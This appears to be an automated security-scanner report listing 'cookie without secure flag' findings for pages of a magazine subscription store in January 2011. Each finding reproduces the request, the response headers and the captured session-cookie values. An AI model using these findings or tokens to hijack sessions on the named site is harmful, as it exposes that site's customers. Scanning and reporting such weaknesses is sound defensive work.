8.1. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Allure previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Allure

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=0000G-h5yYIX_fsCdYaaomzo48b:12jnveaj2; Path=/
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YB%0aJl69zTeOdt0W%2fI1bQxUaXluBK4%2b4re%2bNGtxBIVjSxQMGJbwroUJ2uepbtFXi4W8%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16419596%3atrue%3afalse%3a0%3aqFLccT2YrlnZwn4eqF9jLONT7P4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Allure HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:44:43 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000G-h5yYIX_fsCdYaaomzo48b:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:23 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YB%0aJl69zTeOdt0W%2fI1bQxUaXluBK4%2b4re%2bNGtxBIVjSxQMGJbwroUJ2uepbtFXi4W8%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419596%3atrue%3afalse%3a0%3aqFLccT2YrlnZwn4eqF9jLONT7P4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.2. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=0000xNqeoIoWgm7tfT4YP_0pvgw:12jr714ca; Path=/
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fCa%0adt0Ca5sgwGLGZRYgwcw9yVBAEI4l4WP6D%2flSrQrYmWvnSq3PAt9DJMCltsf9lks%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16420003%3atrue%3afalse%3a0%3amAg2jXtkO5mMA5V5w%2f5pyYw%2fn1g%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:44:38 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000xNqeoIoWgm7tfT4YP_0pvgw:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:29 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fCa%0adt0Ca5sgwGLGZRYgwcw9yVBAEI4l4WP6D%2flSrQrYmWvnSq3PAt9DJMCltsf9lks%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420003%3atrue%3afalse%3a0%3amAg2jXtkO5mMA5V5w%2f5pyYw%2fn1g%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 26827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.3. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_BonAppetite previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_BonAppetite

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=0000tbdA8jKr2XFeez646mYyAzj:12jnveaj2; Path=/
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0bb%0agmx%2fBKjEubD1u2lDzKNrp%2fxq%2fEh3zocUN0K08ospwh0L1bcod31%2fGhJWskPe%2bvA%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16419605%3atrue%3afalse%3a0%3a6TUPgGq3ci7IPBw4tu5kSdECWw4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_BonAppetite HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:44:51 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000tbdA8jKr2XFeez646mYyAzj:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:41 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0bb%0agmx%2fBKjEubD1u2lDzKNrp%2fxq%2fEh3zocUN0K08ospwh0L1bcod31%2fGhJWskPe%2bvA%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419605%3atrue%3afalse%3a0%3a6TUPgGq3ci7IPBw4tu5kSdECWw4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.4. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Brides previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Brides

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=00004nur2b4AB8GyjoBhBXHJFNN:12jnveaj2; Path=/
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Za%0aN8I5U1fIm%2bVXFNkHZc7mzEyRNk9R93bc3Z%2bj3WRLr%2f%2fLUA4vR9PWa%2b%2fqrTv2%2bGU%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16419602%3atrue%3afalse%3a0%3aA5S73L%2bBXNF58pGv%2flPBhYu4lts%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Brides HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:44:48 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00004nur2b4AB8GyjoBhBXHJFNN:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:39 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Za%0aN8I5U1fIm%2bVXFNkHZc7mzEyRNk9R93bc3Z%2bj3WRLr%2f%2fLUA4vR9PWa%2b%2fqrTv2%2bGU%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419602%3atrue%3afalse%3a0%3aA5S73L%2bBXNF58pGv%2flPBhYu4lts%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.5. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=0000MTLmULOAO5VhhPygy4Acrs9:12jr714ca; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:45:13 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000MTLmULOAO5VhhPygy4Acrs9:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:52 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 350



<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<head>
<title>Generic System Error Test JSP (Item)
...[SNIP]...

8.6. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=0000DEGztK4KuU8jzcAvA-zQ_sb:12jnveaj2; Path=/
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YF%0a57LJD52VFrIOn1bSX%2fQv09%2bRP8hqpL9gI8glNNCvaGm3LmA3Rod42Mm2tHMtlbM%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16419613%3atrue%3afalse%3a0%3aRsNgMu8ZswVr2yV3hDnh86UdQV4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:45:14 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000DEGztK4KuU8jzcAvA-zQ_sb:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:54 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YF%0a57LJD52VFrIOn1bSX%2fQv09%2bRP8hqpL9gI8glNNCvaGm3LmA3Rod42Mm2tHMtlbM%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419613%3atrue%3afalse%3a0%3aRsNgMu8ZswVr2yV3hDnh86UdQV4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 30231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.7. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Details previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Details

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=0000zj5CriHITh3Pg1Mh5DZbRfE:12jnveaj2; Path=/
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YS%0ao3Xdx2qkaVDxuC3UboHigZndhxzkaCnU0SpqoYzOdQi9%2byvcsP9hI3YzV%2bKI6%2bA%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16419618%3atrue%3afalse%3a0%3aWmgETUm9LlNs4rLQTSOMj7IzaB0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Details HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:45:07 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000zj5CriHITh3Pg1Mh5DZbRfE:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:59 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YS%0ao3Xdx2qkaVDxuC3UboHigZndhxzkaCnU0SpqoYzOdQi9%2byvcsP9hI3YzV%2bKI6%2bA%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419618%3atrue%3afalse%3a0%3aWmgETUm9LlNs4rLQTSOMj7IzaB0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 27507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.8. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ElegantBride previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_ElegantBride

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=00003mw4fmwQBidF23NiJkaoStU:12jnveaj2; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_ElegantBride HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:45:24 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00003mw4fmwQBidF23NiJkaoStU:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:54:04 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 350



<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<head>
<title>Generic System Error Test JSP (Item)
...[SNIP]...

8.9. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GQ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_GQ

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=0000K8AjziO3qYOdmYpv17Si2wk:12jnveaj2; Path=/
WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YY%0a3oIHkEKIKs9o38uGG7kfp27zsKCrzdwCfVBZPklGPhUU1l2AYQ5kNDxv1fiDpfo%3d; Path=/
WC_GENERIC_ACTIVITYDATA=[16419713%3atrue%3afalse%3a0%3aoNunPdPRwDso5BWF0B3DMK%2b7aGY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_GQ HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:46:58 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000K8AjziO3qYOdmYpv17Si2wk:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:55:38 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
